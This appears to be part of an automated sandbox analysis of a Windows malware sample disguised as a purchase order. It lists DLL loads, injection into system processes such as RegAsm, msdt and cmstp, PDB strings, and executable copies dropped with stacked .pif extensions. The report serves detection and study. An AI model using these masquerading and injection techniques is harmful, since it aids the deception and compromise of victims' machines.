Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rasapi32.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rasman.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rtutils.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: amsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: userenv.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: version.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: wldp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: profapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rasapi32.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rasman.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rtutils.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: amsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: userenv.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: devobj.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: version.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: wldp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: profapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rasapi32.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rasman.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rtutils.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: amsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: userenv.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PURCHASED ORDER OF ENG091.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PURCHASED ORDER OF ENG091.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PURCHASED ORDER OF ENG091.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: chkdsk.pdbGCTL source: RegAsm.exe, 00000045.00000002.2892603642.0000000001380000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000046.00000002.2895393793.0000000000130000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmstp.pdbGCTL source: RegAsm.exe, 00000007.00000002.2235793612.0000000001540000.00000040.10000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3365281971.0000000000220000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdb source: RegAsm.exe, 00000013.00000002.2357394928.0000000001720000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367071175.0000000000370000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msdt.pdbGCTL source: RegAsm.exe, 0000001B.00000002.2433869260.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436801979.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, msdt.exe, 00000025.00000002.2526883807.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824411296.0000000000E80000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netsh.pdb source: RegAsm.exe, 0000004D.00000002.3028255621.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 0000004E.00000002.3033972586.0000000000A60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\password_generator-master\obj\Debug\Aewlani.pdb source: PURCHASED ORDER OF ENG091.exe, 00000000.00000000.2119834627.0000000000442000.00000002.00000001.01000000.00000003.sdmp, cmd.exe, 00000005.00000003.2161957449.00000000032E5000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2315915569.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000003.2390659515.0000000003086000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000022.00000003.2479534553.0000000002695000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002A.00000003.2596807840.0000000003135000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000032.00000003.2684351983.00000000032E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000003A.00000003.2769484455.0000000002905000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000043.00000003.2848660519.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000004B.00000003.2975731288.00000000035E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: RegAsm.exe, 00000013.00000002.2357394928.0000000001720000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367071175.0000000000370000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: chkdsk.pdb source: RegAsm.exe, 00000045.00000002.2892603642.0000000001380000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000046.00000002.2895393793.0000000000130000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.2237767546.0000000004599000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.3366809069.0000000004740000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.2235631145.00000000043E5000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.3366809069.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000003.2357315746.0000000004B0F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000003.2364128162.0000000004CBC000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367516642.000000000500E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367516642.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436864306.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436864306.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000003.2432746712.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000001C.00000003.2435053187.0000000004854000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000025.00000002.2527278356.000000000502E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000025.00000002.2527278356.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000025.00000003.2522733065.0000000004AEF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000025.00000003.2524932833.0000000004CDC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.2644284547.00000000046C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.2647610865.0000000004879000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2649407934.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2649407934.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000003.2729298239.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732895661.0000000002CE0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732895661.0000000002E7E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000003.2727219080.0000000002985000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000003E.00000003.2815565973.0000000004B43000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824847586.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824847586.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000003E.00000003.2812512464.0000000004999000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000046.00000003.2893566375.00000000056D8000.00000004.00000020.00020000.00000
Source:	Binary string: RegAsm.pdb source: explorer.exe, 00000008.00000002.3389406505.0000000010A9F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3367455817.0000000004C8F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3365692981.000000000293B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netsh.pdbGCTL source: RegAsm.exe, 0000004D.00000002.3028255621.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 0000004E.00000002.3033972586.0000000000A60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.2237767546.0000000004599000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.3366809069.0000000004740000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.2235631145.00000000043E5000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.3366809069.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000003.2357315746.0000000004B0F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000003.2364128162.0000000004CBC000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367516642.000000000500E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000014.00000002.2367516642.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436864306.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436864306.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000001C.00000003.2432746712.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000001C.00000003.2435053187.0000000004854000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000025.00000002.2527278356.000000000502E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000025.00000002.2527278356.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000025.00000003.2522733065.0000000004AEF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000025.00000003.2524932833.0000000004CDC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.2644284547.00000000046C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.2647610865.0000000004879000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2649407934.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2649407934.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000003.2729298239.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732895661.0000000002CE0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732895661.0000000002E7E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000035.00000003.2727219080.0000000002985000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000003E.00000003.2815565973.0000000004B43000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824847586.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824847586.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000003E.00000003.2812512464.0000000004999000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000046.00000003.2893566375.00000000056D8000.00000004.00000020.00020
Source:	Binary string: rundll32.pdb source: RegAsm.exe, 0000002C.00000002.2646537881.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2648985101.0000000000270000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wlanext.pdb source: RegAsm.exe, 00000034.00000002.2729173666.0000000002940000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732547455.0000000000960000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegAsm.exe, 0000002C.00000002.2646537881.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 0000002D.00000002.2648985101.0000000000270000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmstp.pdb source: RegAsm.exe, 00000007.00000002.2235793612.0000000001540000.00000040.10000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3365281971.0000000000220000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: explorer.exe, 00000008.00000002.3389406505.0000000010A9F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3367455817.0000000004C8F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3365692981.000000000293B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: RegAsm.exe, 0000001B.00000002.2433869260.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 0000001C.00000002.2436801979.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, msdt.exe, 00000025.00000002.2526883807.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, msdt.exe, 0000003E.00000002.2824411296.0000000000E80000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: RegAsm.exe, 00000034.00000002.2729173666.0000000002940000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000035.00000002.2732547455.0000000000960000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Code function: 0_2_00A88FA0 push eax; iretd	0_2_00A88F87
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Code function: 0_2_00A88F7D push eax; iretd	0_2_00A88F87
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Code function: 0_2_00A8D9BA push esp; ret	0_2_00A8D9F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004179C8 push es; retf	7_2_004179C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00410B2E push edx; retf	7_2_00410B2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D4E2 push eax; ret	7_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D4EB push eax; ret	7_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D495 push eax; ret	7_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D54C push eax; ret	7_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00407D65 push esi; iretd	7_2_00407D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004165BD push esi; retf	7_2_004165BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033509AD push ecx; mov dword ptr [esp], ecx	7_2_033509B6
Source: C:\Windows\explorer.exe	Code function: 8_2_08D779B5 push esp; retn 0000h	8_2_08D77AE7
Source: C:\Windows\explorer.exe	Code function: 8_2_08D77B1E push esp; retn 0000h	8_2_08D77B1F
Source: C:\Windows\explorer.exe	Code function: 8_2_08D77B02 push esp; retn 0000h	8_2_08D77B03
Source: C:\Windows\explorer.exe	Code function: 8_2_0B89EB02 push esp; retn 0000h	8_2_0B89EB03
Source: C:\Windows\explorer.exe	Code function: 8_2_0B89EB1E push esp; retn 0000h	8_2_0B89EB1F
Source: C:\Windows\explorer.exe	Code function: 8_2_0B89E9B5 push esp; retn 0000h	8_2_0B89EAE7
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE42B02 push esp; retn 0000h	8_2_0BE42B03
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE42B1E push esp; retn 0000h	8_2_0BE42B1F
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE429B5 push esp; retn 0000h	8_2_0BE42AE7
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5B3B1E push esp; retn 0000h	8_2_0E5B3B1F
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5B3B02 push esp; retn 0000h	8_2_0E5B3B03
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5B39B5 push esp; retn 0000h	8_2_0E5B3AE7
Source: C:\Windows\explorer.exe	Code function: 8_2_0E756B1E push esp; retn 0000h	8_2_0E756B1F
Source: C:\Windows\explorer.exe	Code function: 8_2_0E756B02 push esp; retn 0000h	8_2_0E756B03
Source: C:\Windows\explorer.exe	Code function: 8_2_0E7569B5 push esp; retn 0000h	8_2_0E756AE7
Source: C:\Windows\explorer.exe	Code function: 8_2_0E880B02 push esp; retn 0000h	8_2_0E880B03
Source: C:\Windows\explorer.exe	Code function: 8_2_0E880B1E push esp; retn 0000h	8_2_0E880B1F
Source: C:\Windows\explorer.exe	Code function: 8_2_0E8809B5 push esp; retn 0000h	8_2_0E880AE7
Source: C:\Windows\explorer.exe	Code function: 8_2_101E69B5 push esp; retn 0000h	8_2_101E6AE7

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Jump to dropped file

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif	Jump to dropped file
